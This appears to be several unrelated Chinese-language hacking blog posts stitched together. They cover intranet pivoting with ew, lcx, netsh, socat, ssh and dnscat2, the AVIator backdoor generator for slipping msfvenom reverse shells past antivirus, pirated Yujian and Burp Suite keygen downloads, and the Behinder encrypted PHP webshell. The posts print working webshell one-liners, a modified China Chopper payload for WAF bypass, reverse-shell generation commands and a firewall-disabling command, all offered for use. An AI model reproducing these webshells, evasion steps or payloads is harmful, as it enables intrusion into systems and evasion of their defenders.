反向socks5

attacker执行，监听8888端口转发到1080端口

ew -s rcsocks -l 1080 -e 8888

在server中启动socks5服务，并且反弹到attacker的8888端口

ew -s rssocks -d 172.16.2.18 -e 8888

在client中就可以用这个代理了

curl http://172.16.2.8/ -x socks5://172.16.1.144:1080

client <-> attacker 1080 <-> attacker 8888 <-> server

端口转发

这里着重说一下lcx_tran、lcx_listen、lcx_slave的用法。

案例一：

在attacker中启动一个socks5代理，端口是9999

ew -s ssocksd -l 9999

然后通过lcx_tran来转发9999到1080

ew.exe -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

然后就能从client访问server了

curl http://172.16.2.8/ -x socks5://172.16.1.144:1080

实际上还是用attacker搭了一个socks5代理，这个例子主要说的是lcx_tran的使用方法。

案例二：
attacker:

ew.exe -s lcx_listen -l 1234 -e 8888

server:

ew.exe -s lcx_slave -d 192.168.1.100 -e 8888 -f 127.0.0.1 -g 3389

原理和lcx一样

多级级联

假如我们当前的网络环境如下

a: 192.168.1.100
b: 192.168.1.101,10.0.0.1
c: 10.0.0.2,172.16.0.1
d: 172.16.0.2

那么我们怎么做才能让a访问到d的资源呢？

ew提供了多级级联

a: ew.exe -s lcx_listen -l 1080 -e 8888
b: ew.exe -s lcx_slave -d 192.168.1.100 -e 8888 -f 10.0.0.2  -g 9999
c: ew.exe -s lcx_tran -l 9999 -f 172.16.0.2 -g 3389

数据流向

a 1080 <-> a 8888 <-> b 9999 <-> c 9999 <-> d 3389

netsh

netsh(Network Shell) 是一个windows系统本身提供的功能强大的网络配置命令行工具。

https://docs.microsoft.com/zh-cn/windows-server/networking/technologies/netsh/netsh-contexts

netsh添加规则

netsh interface portproxy set v4tov4 listenaddress=172.16.1.144  listenport=4444 connectaddress=172.16.2.8 connectport=3389

将172.16.1.144的4444端口映射到172.16.2.8的3389

查看规则

C:\Users\Administrator\Desktop>netsh interface portproxy show all

侦听 ipv4:                 连接到 ipv4:

地址            端口        地址            端口
--------------- ----------  --------------- ----------
172.16.1.144    4444        172.16.2.8      3389

删除规则

netsh interface portproxy delete v4tov4 listenaddress=172.16.1.144 listenport=4444

关闭防火墙

netsh firewall set opmode disabled

sSocks

sSocks是一个socks代理工具套装，可用来开启socks代理服务，支持socks5验证，支持IPV6和UDP，并提供反向socks代理服务，即将远程计算机作为socks代理服务端，反弹回本地，极大方便内网的渗透测试。官方地址：http://sourceforge.net/projects/ssocks/

使用方法类似ew

attacker

rcsocks -l 4444 -p 5555 -vv

server

rssocks –vv –s 172.16.2.8:5555

client

curl 172.16.2.8 -x socks5://172.16.1.144:4444

portfwd

portfwd是一款强大的端口转发工具，支持TCP，UDP，支持IPV4–IPV6的转换转发。

portfwd是meterpreter中内置的功能，也有单机exe版本的https://github.com/rssnsj/portfwd

较为简单，不举例了。

以上我们将的都是win平台下的tcp端口转发，接下来我们看Linux平台下的。

改变下我们当前的网络结构

win10 client:172.16.1.1

kali attacker:172.16.1.141 172.16.2.19

win2008 server:172.16.2.8

我们现在的目的是通过kali的转发来使client连接到server的3389

socat

socat是一个多功能的网络工具，名字来由是” Socket CAT”，可以看作是netcat的N倍加强版，socat的官方网站：http://www.dest-unreach.org/socat/

socat的主要特点就是在两个数据流之间建立通道，且支持众多协议和链接方式：ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,socket等。

端口转发

socat TCP4-LISTEN:4444 TCP4:172.16.2.8:3389

client连接172.16.1.141:4444就是连接server的3389

如果需要使用并发连接，则加一个fork,如下:

socat TCP4-LISTEN:4444,fork TCP4:172.16.2.8:3389

端口映射

在一个NAT环境，如何从外部连接到内部的一个端口呢？只要能够在内部运行socat就可以了。

attacker

socat tcp-listen:1234 tcp-listen:3389 

server

socat tcp:172.16.2.19:1234 tcp:172.16.2.8:3389

这样，你外部机器上的3389就映射在内部网172.16.2.8的3389端口上。

mstsc 172.16.1.141:3389

参考倾旋师傅的文章https://payloads.online/tools/socat

我们再来看看基于ssh协议的端口转发，环境跟上文一样。

ssh

SSH 会自动加密和解密所有 SSH 客户端与服务端之间的网络数据。但是，SSH 还同时提供了一个非常有用的功能，这就是端口转发。它能够将其他 TCP 端口的网络数据通过 SSH 链接来转发，并且自动提供了相应的加密及解密服务。

https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html

SSH 端口转发能够提供两大功能：

1. 加密 SSH Client 端至 SSH Server 端之间的通讯数据。
2. 突破防火墙的限制完成一些之前无法建立的 TCP 连接。

参数：

-C Enable compression.

压缩数据传输。

-N Do not execute a shell or command.
不执行脚本或命令，通常与-f连用。

-g Allow remote hosts to connect to forwarded ports.
在-L/-R/-D参数中，允许远程主机连接到建立的转发的端口，如果不加这个参数，只允许本地主机建立连接。

-f Fork into background after authentication.
后台认证用户/密码，通常和-N连用，不用登录到远程主机。

本地端口转发

所谓本地端口转发，就是将发送到本地端口的请求，转发到目标端口。这样，就可以通过访问本地端口，来访问目标端口的服务。

client(win10有ssh命令)

ssh -CfNg -L 4444:172.16.2.8:3389 root@172.16.1.141

此时client去连接localhost:4444就是server:3389

远程端口转发

所谓远程端口转发，就是将发送到远程端口的请求，转发到目标端口。这样，就可以通过访问远程端口，来访问目标端口的服务。

client

ssh -CfNg -R 4444:172.16.1.1:3389 root@172.16.1.141

此时client去连接localhost:4444就是server:3389

本地转发与远程转发的对比

首先，SSH 端口转发自然需要 SSH 连接，而 SSH 连接是有方向的，从 SSH Client 到 SSH Server 。而我们的应用也是有方向的，比如需要连接远程桌面时，远程桌面自然就是 Server 端，我们应用连接的方向也是从应用的 Client 端连接到应用的 Server 端。如果这两个连接的方向一致，那我们就说它是本地转发。而如果两个方向不一致，我们就说它是远程转发。

总的思路是通过将 TCP 连接转发到 SSH 通道上以解决数据加密以及突破防火墙的种种限制。对一些已知端口号的应用，例如 Telnet/LDAP/SMTP，我们可以使用本地端口转发或者远程端口转发来达到目的。

如果你对ssh转发还有问题的话，推荐阅读以下文章

• SSH隧道与端口转发及内网穿透
• 实战 SSH 端口转发
• 玩转SSH端口转发

ssh架设socks代理

client

ssh -qTfnN -D 1080 172.16.1.141

client上架设socks，端口1080，数据通过attacker转发到内网。

dnscat2

dnscat2 是一款基于 DNS 协议的代理隧道。不仅支持端口转发，另外还有执行命令，文件传输等功能。其原理与 DNS Log 类似, 分为直连和中继两种模式, 前者直接连接服务端的 53 端口, 速度快, 但隐蔽性差, 后者通过对所设置域名的递归查询进行数据传输, 速度慢, 但隐蔽性好。

创建一条端口转发

(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (LAPTOP) 1> listen 1234 127.0.0.1:3389
Listening on 0.0.0.0:1234, sending connections to 127.0.0.1:3389
command (LAPTOP) 1> 

这个我没有测试，这个参考 @X1r0z 的文章 dnscat2 tunnel

至于更多用法请参阅 README.MD

HTTP/HTTPS隧道

http隧道较为简单，在这里举几个有名的http隧道（或是基于http包装的tcp隧道）

1. https://github.com/sensepost/reGeorg
2. https://github.com/nccgroup/ABPTTS 目前不支持PHP
3. https://github.com/SECFORCE/Tunna
4. https://github.com/sensepost/reDuh

如何使用socks代理？

1. shadowsocks
2. sockcap64 windows
3. Proxifier
4. proxychains

踩过的坑

1. win2008 远程桌面黑屏鼠标没反应可能是因为你登录的用户已经登录了。
2. 连不上3389需要先关防火墙。
3. socat尽量用fork，不然一次会话结束后就会断。

写在文后

文章中的很多东西网上都有，端口转发实际上只要明白原理和数据的流向，就很明了了。

但是对于杀软来说，像lcx这种工具传上去就被杀掉了，所以推荐golang自写端口转发工具，当然你也可以在GitHub找一些少见的自写的端口转发工具来规避杀软。比如https://github.com/tavenli/port-forward

参考链接：

• https://micro8.gitbook.io/micro8/contents#91-100-ke
• SSH隧道与端口转发及内网穿透
• 实战 SSH 端口转发
• 玩转SSH端口转发
• socat 使用手册
• Web狗要懂的内网端口转发
• 内网端口转发及穿透

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

Ator是一个后门生成器实用程序，它使用加密和注入技术来绕过AV检测。进一步来说：

• 它使用AES加密来加密给定的shellcode
• 生成包含加密有效负载的可执行文件
• 使用各种注入技术将shellcode解密并注入目标系统

[ 进程注入 ]：

1. 便携式可执行注入，包括将恶意代码直接写入进程（没有磁盘上的文件），然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化，例如反射DLL注入（将自映射DLL写入进程）和内存模块（写入进程时映射DLL）克服了地址重定位问题。
2. 线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似，必须首先暂停该线程。

用法

该应用程序有一个由三个主要输入组成的表单（见下面的截图）：

1. 包含用于加密shellcode的加密密钥的文本
2. 包含用于AES加密的IV的文本
3. 包含shellcode的文本

重要提示：shellcode应作为C＃字节数组提供。

默认值包含执行notepad.exe（32位）的shellcode。提供此演示作为代码应如何形成的指示（使用msfvenom，可以使用-f csharp开关轻松完成，例如msfvenom -p windows / meterpreter / reverse_tcp LHOST = XXXX LPORT = XXXX -f csharp）。

在填充提供的输入并选择输出路径之后，根据所选择的选项生成可执行文件。

RTLO选项

简单来说，欺骗可执行文件看起来像“无辜”扩展，如’pdf’，’txt’等。例如文件“testcod.exe”将被解释为“tesexe.doc”

请注意，某些AV会将恶搞作为恶意软件提醒自己。

设置自定义图标

我想你们都知道它是什么:)

在Win 10 x64主机上绕过卡巴斯基AV（TEST CASE）

在运行完全更新的卡巴斯基AV的Windows 10机器中获取shell

目标机器：Windows 10 x64

1. 使用msfvenom创建有效负载msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
2. 使用AVIator进行以下设置目标OS体系结构：x64

   注入技术：线程劫持（Shellcode Arch：x64，OS arch：x64）

   目标程序：资源管理器（保留默认值）

3. 在攻击者计算机上设置侦听器
4. 在受害计算机上运行生成的exe

安装

Windows：

编译项目或从以下文件夹下载allready编译的可执行文件：

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux：

根据您的Linux发行版安装Mono，下载并运行二进制文件

例如在kali：

详细内容移步https://github.com/Ch0pin/AVIator

膜拜下@yzddmr6师傅

御剑新版 https://pan.baidu.com/s/1yv6flUVrTaK3LUIrezr1rg 提取码：mhdd

解压密码：1

御剑注册机

链接: https://pan.baidu.com/s/1LbqcW7aEGyiAm_mXdf6_cg 提取码: 46a4

截图

Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。为什么要汉化？做为一个半路出家英语不好的人时常不认识某些单词而烦恼，当然这里只是针对自己做评价，大佬众多，如果英语非常流利可以跳过此工具，不下载,不评价.

0x1 使用方法

早期我司大牛就已经提出来，javaagent技术，该技术应用很广这里是是小试牛刀，JavaAgent 是运行在 main方法之前的拦截器，它内定的方法名叫 premain ，也就是说先执行 premain 方法然后再执行 main 方法。用处都明白了吧。具体代码可以反编译jar包。 这里只是用提前翻译好的文本替换了burp内的字节码内容。按道理所有burp都能使用本工具，但是我只测试1.7.X～2.X的版本防止有部分人爱钻牛角尖，所以你懂得。欢迎各路大佬测试是否有后门。

Linux Mac 下加载 burp-loader-keygen.jar

java -javaagent:BurpSuiteCn.jar -Xbootclasspath/p:burp-loader-keygen.jar  -Xmx1024m -jar burpsuite_pro_v1.x.x.jar

Windwos 下加载 burp-loader-keygen.jar

需要指定编码否则会乱码！！！

java -Dfile.encoding=utf-8 -javaagent:BurpSuiteCn.jar -Xbootclasspath/p:burp-loader-keygen.jar  -Xmx1024m -jar burpsuite_pro_v1.x.x.jar

 

自定义翻译规则

包内自带翻译包。 在同目录下新建cn.txt写入一下内容如： 注意一下 \t 是分割符， 左边是需要匹配的 右边是替换的 支持正则表达式。

Proxy \t 代理 
The analysis is based on a sample of ([0-9]+) tokens?. Based on the sample size, the reliability of the results is: (.*)    分析$1基于令牌样本。 根据样本量，可靠性如下： $2

 

 

下载

MD5 (BurpSuiteCn.jar) = df282917e650c4c2cd1f49e262e6f30f

链接:https://pan.baidu.com/s/1-25OIjPRpt_vPgBDwVCqUQ  密码:e6tn

 

0x2 效果截图

burpsuite_pro_v2.X

burpsuite_pro_v1.7.X

rebeyond大大出的神器冰蝎下载地址

作为新型加密网站管理客户端，冰蝎算是作为中国菜刀的替代者。我们来看下他的主要功能。

主要功能

1. 基本信息

客户端和服务端握手之后，会获取服务器的基本信息，Java、.NET版本包括环境变量、系统属性等，PHP版本会显示phpinfo的内容。

2. 文件管理

这个没什么好说的，无非是文件的增删改查，稍微不同的是上传的文件都是加密传输的，可以避免被拦截。

3. 命令执行

执行单条操作系统命令。

4. 虚拟终端

虚拟终端是模拟了一个真实的交互式Shell环境，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql。比如说：我们可以在这个Shell里去ssh连接服务器侧内网的其他主机，可以参考下面这个动图：

当然，如果你习惯powershell，也可以弹个powershell出来，如下图：

5. Socks代理

虚拟终端功能其实就已经部分实现了内网穿透的能力，在Shell环境里做的所有事情都是在内网环境中的。不过为了方便使用其他工具，客户端还提供了基于一句话木马的Socks代理功能，一键开启，简单高效，可以参考如下动图：

顺便说一下，代理过程中所有的流量都是在socks的基础上封装了一层AES。

6.反弹Shell

反弹Shell是突破防火墙的利器，也几乎是后渗透过程的必备步骤。提到后渗透，当然少不了metasploit，提到metasploit，当然少不了meterpreter，所以冰蝎客户端提供了两种反弹Shell的方式，常规Shell和Meterpreter，实现和metasploit的一键无缝对接。请参考如下动图：

上图演示的是Meterpreter，当然常规的Shell也可以对接metasploit，就不演示了。

7.数据库管理

常规功能，实现了数据库的可视化管理，放张截图吧：

和常规管理工具不同的是，在Java和.NET环境中，当目标机器中没有对应数据库的驱动时，会自动上传并加载数据库驱动。比如目标程序用的是MySQL的数据，但是内网有另外一台Oracle，此时就会自动上传并加载Oracle对应的驱动。

8.自定义代码

可以在服务端执行任意的Java、PHP、C#代码，这也是个常规功能，值得一提的是我们输入的代码都是加密传输的，所以不用为了躲避waf而用各种编码变形，效果请参考如下动图：

9.备忘录

渗透的时候总有很多零碎的信息需要记录，所以针对每个Shell提供了一个备忘录的功能，目前只支持纯文本，粘贴进去自动保存：

接下来我们看下他的亮点出在哪里

看下他的php一句话

<?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&$b[0]($b[1]);?>

为了代码可读性，我们来扩充下：

<?php
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $decrptContent=openssl_decrypt(file_get_contents("php://input"), "AES128", $key);
    $arr=explode('|',$decrptContent);
    $func=$arr[0];
    $params=$arr[1];
    $func($params);
}
?>

介绍下流程

• 首先get发起带密码的请求，服务端随机产生密钥存入session。

• 获取session中的密钥，然后将客户端发送的源代码进行aes加密，通过|分割，然后通过php的可变函数执行。

具体一点，比如我们客户端有一段代码

assert|eval("phpinfo();")

进行aes128加密发送给服务端，服务端用explode函数分割字符，索引为0的是assert，索引为1的是eval("phpinfo();")，然后通过可变函数执行assert("eval(\"phpinfo();\")")，这样就很清晰明了了。

过waf的效果

常规一句话<?php @eval($_POST['caidao']);?>菜刀链接：

新型一句话冰蝎链接：

对菜刀的修改

对这个一句话颇感兴趣，那么我们是不是可以把菜刀也改一改呢？

我本地搭建了环境，一句话内容为<?php @eval($_POST['caidao']);?>

先来抓包看下菜刀的请求包

在新版菜刀2016的caidao.conf中45行，%s是执行的命令

ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s

解密后

eval(base64_decode($_POST[id]));&id=%s

那么我们的一句话可以这样写

<?php
if ($_GET['pass']!=1){
}
else{
    $decrpt = file_get_contents("php://input");
    $arrs = explode("|", $decrpt)[1];
    $arrs = explode("|", base64_decode($arrs));
    call_user_func($arrs[0],$arrs[1]);
}
​
?>

你也可以这样来

<?php
$decrpt = $_POST['x'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
var_dump($arrs[0],$arrs[1]);
call_user_func($arrs[0],$arrs[1]);
?>

那么我们菜刀要改下

|assert|eval(base64_decode($_POST[id]));|&id=%s

在caidao.conf的45行就要改成

|YXNzZXJ0fGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbaWRdKSk7|&id=%s

这样和冰蝎实现的效果就一样了，同样过狗，愉快玩耍吧！

涉及到的资料，表示感谢！

https://www.t00ls.net/thread-48079-1-1.html

https://xz.aliyun.com/t/2774